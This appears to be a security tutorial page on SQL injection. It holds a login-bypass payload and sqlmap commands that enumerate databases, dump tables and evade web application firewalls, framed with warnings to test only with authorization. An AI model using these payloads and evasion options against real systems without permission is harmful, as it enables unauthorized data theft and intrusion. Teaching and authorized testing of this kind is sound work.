SQL Injection
Introduction to SQL Injection
SQL Injection (SQLi) is a common web application vulnerability that allows attackers to interfere with the queries an application makes to its database. By injecting malicious SQL statements into a form field or URL parameter, attackers can gain unauthorized access to data, manipulate database entries, or even execute commands on the server.
SQL Injection attacks are illegal without permission. You should only test systems you have authorization to assess. Unauthorized testing can lead to severe legal consequences.
Types of SQL Injection
-
In-band SQLi:
- The attacker is able to use the same communication channel to both inject the malicious SQL commands and retrieve results. The most common types are:
- Error-based SQLi: Relies on error messages returned by the database.
- Union-based SQLi: Leverages the
UNIONSQL operator to combine multiple select queries.
- The attacker is able to use the same communication channel to both inject the malicious SQL commands and retrieve results. The most common types are:
-
Inferential SQLi (Blind SQLi):
- The attacker does not receive direct feedback from the database but infers the database's response by analyzing the behavior of the application. This can be:
- Boolean-based SQLi: Exploits the fact that the SQL query's result will alter the behavior of the application depending on the query's truth value.
- Time-based SQLi: Manipulates the database to delay its responses, allowing the attacker to infer data based on the response time.
- The attacker does not receive direct feedback from the database but infers the database's response by analyzing the behavior of the application. This can be:
-
Out-of-band SQLi:
- The attacker relies on external server responses (such as DNS or HTTP requests) to exfiltrate data.
Example of SQL Injection
Let's assume we have a vulnerable login form where the backend SQL query looks like this:
SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password';
An attacker could submit the following input:
input_username:' OR 1=1 --input_password:anything
This modifies the SQL query to:
SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'anything';
In this case, 1=1 is always true, allowing the attacker to bypass authentication.
SQL Injection Tutorial
This tutorial will guide you through identifying and exploiting SQL injection vulnerabilities using SQLmap, a popular open-source tool.
Step 1: Identifying a Vulnerable Parameter
Use a basic SQL injection payload to test if a web application's parameter is vulnerable. For example, on a URL like this:
http://example.com/page.php?id=1
Try modifying the id parameter to:
http://example.com/page.php?id=1' OR '1'='1
Step 2: Installing SQLmap
Pre-installed with Kali Linux.
SQLmap can be installed via Git:
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
On Kali Linux, you don't need to type python sqlmap.py in the command line. The command has been aliased to sqlmap
python sqlmap.py -u "http://example.com/page.php?id=1" --dbs
-uspecifies the URL to test.--dbsenumerates the databases.
Step 4: Extracting Data
Once SQLmap confirms that the parameter is vulnerable, you can extract specific data from the database. For example, to extract data from a specific table:
python sqlmap.py -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
-Dspecifies the database name.-Tspecifies the table name.--dumpextracts all the data from the specified table.
Step 5: Avoiding Detection
To avoid detection by web application firewalls (WAFs), SQLmap allows you to use various evasion techniques, such as encoding payloads or delaying requests:
python sqlmap.py -u "http://example.com/page.php?id=1" --random-agent --delay=2 --hex
--random-agent: Randomizes the user agent in each request.--delay: Adds a delay between each request to avoid triggering rate limits.--hex: Encodes the payload in hexadecimal to evade detection.
Conclusion
SQL Injection is a powerful attack vector, and tools like SQLmap make it easier to exploit vulnerable systems. However, it’s crucial to remember that ethical guidelines must always be followed. Testing without permission is illegal and unethical. Always ensure that you are operating within the boundaries of the law and with explicit consent.